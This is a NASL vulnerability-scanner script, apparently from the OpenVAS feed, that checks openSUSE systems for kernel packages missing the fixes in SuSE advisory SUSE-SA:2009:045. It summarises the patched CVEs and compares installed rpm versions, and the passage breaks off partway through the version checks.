Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Linux kernel update fixes the following security issues:\n\nCVE-2009-2692: A missing NULL pointer check in the socket sendpage\nfunction can be used by local attackers to gain root privileges.\n[SLES9, SLES10-SP2, SLE11, openSUSE]\n\nCVE-2009-1389: A crash on r8169 network cards when receiving\nlarge packets was fixed.\n[SLES9, SLES10-SP2, SLE11, openSUSE]\n\nCVE-2009-1758: The hypervisor_callback function in Xen allows guest\nuser applications to cause a denial of service (kernel oops) of the\nguest OS by triggering a segmentation fault in certain address\nranges.\n[SLES9, SLES10-SP2, SLE11, openSUSE]\n\nCVE-2009-1630: The nfs_permission function in fs/nfs/dir.c in the\nNFS client implementation in the Linux kernel, when atomic_open is\navailable, does not check execute (aka EXEC or MAY_EXEC) permission\nbits, which allows local users to bypass permissions and execute files,\nas demonstrated by files on an NFSv4 fileserver\n[SLE10-SP2, SLE11, openSUSE]\n\nCVE-2009-2406: A kernel stack overflow when mounting eCryptfs\nfilesystems in parse_tag_11_packet() was fixed. Code execution might\nbe possible if ecryptfs is in use.\n[SLE11, openSUSE]\n\nCVE-2009-2407: A kernel heap overflow when mounting eCryptfs\nfilesystems in parse_tag_3_packet() was fixed. Code execution might\nbe possible if ecryptfs is in use.\n[SLE11, openSUSE]\n\n(no CVE assigned yet): An information leak from using sigaltstack.\n[SLES9, SLES10-SP2, SLE11, openSUSE]\n\nCVE-2009-0676: A memory disclosure via the SO_BSDCOMPAT socket\noption\n[openSUSE 10.3 only]\n\nCVE-2009-1895: Personality flags on set*id were not cleared\ncorrectly, so ASLR and NULL page protection could be bypassed.\n[openSUSE 11.0 only]\n\nCVE-2009-1046: utf-8 console memory corruption that can be used for\nlocal privilege escalation\n[openSUSE 11.0 only]\n\nCVE-2008-5033: Oops in video4linux tvaudio\n[openSUSE 11.0 only]\n\nCVE-2009-1385: A Integer underflow in the e1000_clean_rx_irq\nfunction in drivers/net/e1000/e1000_main.c in the e1000 driver the\ne1000e driver in the Linux kernel, and Intel Wired Ethernet (aka\ne1000) before 7.5.5 allows remote attackers to cause a denial of\nservice (panic) via a crafted frame size.\n[openSUSE 11.0 only]\n\nThe mmap_min_addr sysctl is now enabled by default to protect\nagainst kernel NULL page exploits.\n[SLE11, openSUSE 11.0-11.1]\n\nThe -fno-delete-null-pointer-checks compiler option is now used to\nbuild the kernel to avoid gcc optimizing away NULL pointer checks.\nAlso -fwrapv is now used everywhere.\n[SLES9, SLES10-SP2, SLE11, openSUSE]\n\nThe kernel update also contains numerous other, non-security\nbug fixes. Please refer to the rpm changelog for a detailed list.\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:045\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:045.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64761\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2008-5033\", \"CVE-2009-0676\", \"CVE-2009-1046\", \"CVE-2009-1385\", \"CVE-2009-1389\", \"CVE-2009-1630\", \"CVE-2009-1758\", \"CVE-2009-1895\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-2692\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:045 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source-debuginfo\", rpm:\"kernel-source-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-debug\", rpm:\"aufs-kmp-debug~cvs20081020_2.6.27.29_0.1~1.32.14\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-trace\", rpm:\"aufs-kmp-trace~cvs20081020_2.6.27.29_0.1~1.32.14\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"brocade-bfa-kmp-debug\", rpm:\"brocade-bfa-kmp-debug~1.1.0.2_2.6.27.29_0.1~1.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"brocade-bfa-kmp-trace\", rpm:\"brocade-bfa-kmp-trace~1.1.0.2_2.6.27.29_0.1~1.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dazuko-kmp-debug\", rpm:\"dazuko-kmp-debug~2.3.6_2.6.27.29_0.1~1.49.12\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dazuko-kmp-trace\", rpm:\"dazuko-kmp-trace~2.3.6_2.6.27.29_0.1~1.49.12\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"drbd-kmp-debug\", rpm:\"drbd-kmp-debug~8.2.7_2.6.27.29_0.1~1.19.25\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"drbd-kmp-trace\", rpm:\"drbd-kmp-trace~8.2.7_2.6.27.29_0.1~1.19.25\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"intel-iamt-heci-kmp-debug\", rpm:\"intel-iamt-heci-kmp-debug~3.1.0.31_2.6.27.29_0.1~2.40.12\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"intel-iamt-heci-kmp-trace\", rpm:\"intel-iamt-heci-kmp-trace~3.1.0.31_2.6.27.29_0.1~2.40.12\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"iscsitarget-kmp-debug\", rpm:\"iscsitarget-kmp-debug~0.4.15_2.6.27.29_0.1~89.11.18\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"iscsitarget-kmp-trace\", rpm:\"iscsitarget-kmp-trace~0.4.15_2.6.27.29_0.1~89.11.18\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-extra\", rpm:\"kernel-debug-extra~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-extra\", rpm:\"kernel-default-extra~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ec2-extra\", rpm:\"kernel-ec2-extra~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-extra\", rpm:\"kernel-pae-extra~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-trace-extra\", rpm:\"kernel-trace-extra~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-extra\", rpm:\"kernel-xen-extra~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kqemu-kmp-debug\", rpm:\"kqemu-kmp-debug~1.4.0pre1_2.6.27.29_0.1~2.1.12\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kqemu-kmp-trace\", rpm:\"kqemu-kmp-trace~1.4.0pre1_2.6.27.29_0.1~2.1.12\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kvm-kmp-trace\", rpm:\"kvm-kmp-trace~78_2.6.27.29_0.1~6.7.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lirc-kmp-trace\", rpm:\"lirc-kmp-trace~0.8.4_2.6.27.29_0.1~0.1.14\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ofed-kmp-debug\", rpm:\"ofed-kmp-debug~1.4_2.6.27.29_0.1~21.16.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ofed-kmp-trace\", rpm:\"ofed-kmp-trace~1.4_2.6.27.29_0.1~21.16.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"oracleasm-kmp-debug\", rpm:\"oracleasm-kmp-debug~2.0.5_2.6.27.29_0.1~2.36.14\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"oracleasm-kmp-trace\", rpm:\"oracleasm-kmp-trace~2.0.5_2.6.27.29_0.1~2.36.14\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pcfclock-kmp-debug\", rpm:\"pcfclock-kmp-debug~0.44_2.6.27.29_0.1~227.56.14\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pcfclock-kmp-trace\", rpm:\"pcfclock-kmp-trace~0.44_2.6.27.29_0.1~227.56.14\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"virtualbox-ose-kmp-debug\", rpm:\"virtualbox-ose-kmp-debug~2.0.6_2.6.27.29_0.1~2.8.55\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"virtualbox-ose-kmp-trace\", rpm:\"virtualbox-ose-kmp-trace~2.0.6_2.6.27.29_0.1~2.8.55\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"vmware-kmp-debug\", rpm:\"vmware-kmp-debug~2008.09.03_2.6.27.29_0.1~5.50.37\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"vmware-kmp-trace\", rpm:\"vmware-kmp-trace~2008.09.03_2.6.27.29_0.1~5.50.37\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source-debuginfo\", rpm:\"kernel-source-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acerhk-kmp-debug\", rpm:\"acerhk-kmp-debug~0.5.35_2.6.25.20_0.5~98.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acx-kmp-debug\", rpm:\"acx-kmp-debug~20080210_2.6.25.20_0.5~3.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"appleir-kmp-debug\", rpm:\"appleir-kmp-debug~1.1_2.6.25.20_0.5~108.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at76_usb-kmp-debug\", rpm:\"at76_usb-kmp-debug~0.17_2.6.25.20_0.5~2.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"atl2-kmp-debug\", rpm:\"atl2-kmp-debug~2.0.4_2.6.25.20_0.5~4.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aufs-kmp-debug\", rpm:\"aufs-kmp-debug~cvs20080429_2.6.25.20_0.5~13.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dazuko-kmp-debug\", rpm:\"dazuko-kmp-debug~2.3.4.4_2.6.25.20_0.5~42.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"drbd-kmp-debug\", rpm:\"drbd-kmp-debug~8.2.6_2.6.25.20_0.5~0.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gspcav-kmp-debug\", rpm:\"gspcav-kmp-debug~01.00.20_2.6.25.20_0.5~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"iscsitarget-kmp-debug\", rpm:\"iscsitarget-kmp-debug~0.4.15_2.6.25.20_0.5~63.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ivtv-kmp-debug\", rpm:\"ivtv-kmp-debug~1.0.3_2.6.25.20_0.5~66.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kqemu-kmp-debug\", rpm:\"kqemu-kmp-debug~1.3.0pre11_2.6.25.20_0.5~7.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-debug\", rpm:\"nouveau-kmp-debug~0.10.1.20081112_2.6.25.20_0.5~0.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"omnibook-kmp-debug\", rpm:\"omnibook-kmp-debug~20080313_2.6.25.20_0.5~1.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pcc-acpi-kmp-debug\", rpm:\"pcc-acpi-kmp-debug~0.9_2.6.25.20_0.5~4.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pcfclock-kmp-debug\", rpm:\"pcfclock-kmp-debug~0.44_2.6.25.20_0.5~207.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tpctl-kmp-debug\", rpm:\"tpctl-kmp-debug~4.17_2.6.25.20_0.5~189.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"uvcvideo-kmp-debug\", rpm:\"uvcvideo-kmp-debug~r200_2.6.25.20_0.5~2.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"virtualbox-ose-kmp-debug\", rpm:\"virtualbox-ose-kmp-debug~1.5.6_2.6.25.20_0.5~33.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"vmware-kmp-debug\", rpm:\"vmware-kmp-debug~2008.04.14_2.6.25.20_0.5~21.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"wlan-ng-kmp-debug\", rpm:\"wlan-ng-kmp-debug~0.2.8_2.6.25.20_0.5~107.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenpae\", rpm:\"kernel-xenpae~2.6.22.19~0.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~2.6.3~3.13.46\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump-debuginfo\", rpm:\"kernel-kdump-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump-debugsource\", rpm:\"kernel-kdump-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64-debuginfo\", rpm:\"kernel-ppc64-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64-debugsource\", rpm:\"kernel-ppc64-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ps3-debuginfo\", rpm:\"kernel-ps3-debuginfo~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ps3-debugsource\", rpm:\"kernel-ps3-debugsource~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64\", rpm:\"kernel-ppc64~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64-base\", rpm:\"kernel-ppc64-base~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64-extra\", rpm:\"kernel-ppc64-extra~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ps3\", rpm:\"kernel-ps3~2.6.27.29~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump-debuginfo\", rpm:\"kernel-kdump-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump-debugsource\", rpm:\"kernel-kdump-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64-debuginfo\", rpm:\"kernel-ppc64-debuginfo~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ppc64-debugsource\", rpm:\"kernel-ppc64-debugsource~2.6.25.20~0.5\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-ps3-debuginfo\", 